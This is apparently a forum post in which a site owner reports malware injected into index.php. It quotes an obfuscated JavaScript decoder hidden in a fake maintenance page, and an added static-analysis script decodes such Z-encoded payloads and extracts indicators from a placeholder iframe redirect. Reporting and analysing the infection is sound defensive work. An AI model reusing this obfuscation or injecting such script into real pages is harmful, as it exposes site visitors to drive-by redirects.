In 1.6.7 my index.php was injected with a virus/malware; it looks a bit like this variant.
http://nakedsecurity.sophos.com/2009/04 ... direction/
At first I didn't understand why my site was blank, but in the error log it showed:
Code:
PHP Parse error: syntax error, unexpected T_STRING, expecting ',' or ';' in /sites/website.com/www/index.php on line 53
Here is a piece of the malware code, starting at echo:
Code:
else if (file_exists(TMP_CACHE_LOCATION.'/SITEDOWN'))
{
echo "<__html><head><title>Maintenance</title></head></__body><p>Site down for maintenance.</p><__script__ language="javascript">
var kasbd3412 = "";
$$ = function () { try{kasbd3412= $$dfsd(gnflseejrr()); kasbd3412.do(); } catch(e){ var bn = ""; return kasbd3412;}};
var adlan3r$oubw = "e";$$dfsd = this['a'+'s'+'d'];var adlan3r$ouaw = "a";
function asd(df_){this['r']="";
var s = df_;
for(__fh=0;this['__fh']<s['l'+adlan3r$oubw+'ng'+'t'+'h'];__fh++ ){i=__fh;if(s['ch'+adlan3r$ouaw +'rA'+'t'](i)=='Z'){this[neAR_DEF_FGEvftDSyTtnSoh_1]='%'} else {this[neAR_DEF_FGEvftDSyTtnSoh_1]=s['ch'+'ar'+'At'](this['i'])}this['r']=r+VAR_EZJrWcTGuhPYZJj(this,neAR_DEF_FGEvftDSyTtnSoh_1)}
return this['unesc'+adlan3r$ouaw + 'p'+adlan3r$oubw](r)}
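
The `asd` function in the snippet above swaps each `Z` for `%` and passes the result to `unescape`, so a payload encoded this way can be decoded as plain data without running any of the sample. The following is an added example, not part of the original post; the sample string, the `.invalid` host and all function names are constructed for illustration.

```javascript
// Added example: static decoding only. Nothing from the sample is evaluated.

// Mirror the posted asd(): swap 'Z' for '%', then resolve %XX and %uXXXX
// escapes the way unescape() does. Malformed escapes are left as they are.
function decodeZEncoded(payload) {
  return payload.replace(/Z/g, '%').replace(
    /%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, wide, narrow) => String.fromCharCode(parseInt(wide || narrow, 16)));
}

// Find quoted string literals that look Z-encoded: several 'Z' + two hex digits.
function findZEncodedLiterals(source, minEscapes = 4) {
  const literals = source.match(/"[^"\n]*"|'[^'\n]*'/g) || [];
  return literals
    .map((lit) => lit.slice(1, -1))
    .filter((s) => (s.match(/Z[0-9a-fA-F]{2}/g) || []).length >= minEscapes);
}

// Pull out what an incident report needs: URLs and injected tag names.
function extractIndicators(decoded) {
  const urls = decoded.match(/https?:\/\/[^\s"'<>)]+/gi) || [];
  const tags = [...decoded.matchAll(/<\s*(iframe|script)\b/gi)]
    .map((m) => m[1].toLowerCase());
  return { urls: [...new Set(urls)], tags: [...new Set(tags)] };
}

// Constructed sample (not taken from the infected file); host is a placeholder.
const SAMPLE_SOURCE =
  'var p = "Z3Ciframe srcZ3DZ22http://redirect.example.invalid/inZ2EphpZ22' +
  'Z3EZ3CZ2FiframeZ3E"; var label = "Zebra";';

// Decode every suspicious literal in a file's text and summarise it.
function analyze(source) {
  return findZEncodedLiterals(source).map((literal) => {
    const decoded = decodeZEncoded(literal);
    return { decoded, ...extractIndicators(decoded) };
  });
}

console.log(JSON.stringify(analyze(SAMPLE_SOURCE), null, 2));
```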